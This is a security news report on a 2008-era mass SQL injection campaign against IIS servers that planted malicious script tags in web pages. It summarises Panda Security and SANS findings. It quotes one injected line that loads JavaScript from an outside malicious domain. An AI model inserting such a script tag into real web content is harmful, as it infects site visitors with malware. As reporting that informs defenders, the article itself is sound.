Panda Security is warning administrators of a widespread SQL injection attack against IIS servers. The attack injects IFRAME tags into Web pages that, when launched, could install malware on end users' computers. The company said that so far about 282,000 Web pages have already been infected.
<script src=http://www.nihaorr1.com/1.js>
The script tries to detect specific vulnerabilities on users' computers and, if found, the vulnerabilities are used to inject malware. Panda said that the vulnerabilities are related to MDAC, Vector Markup Language, Kodak Image Viewer, among other inroads. A list is available at PandaLabs' blog.
Last week SANS unveiled the methods that are used to launch the SQL injection attack itself, which is perpetrated using a specialized attack too. According to the analysis provided by researcher Bojan Zdrnja, the tool queries Google to discover sites that are potentially vulnerable. The tool then tries to launch SQL injection attacks against each identified site. The tool's interface is written in Chinese and also had logic that attempted to contact a site in China to record transaction data.
A SANS blog reader, Nathan, wrote to elaborate on the nature of the SQL query itself. According to Nathan, the query used by the tool iterates through all tables to find specific types of columns and then appends data to existing column field data. The data then appears as part of Web pages at affected sites.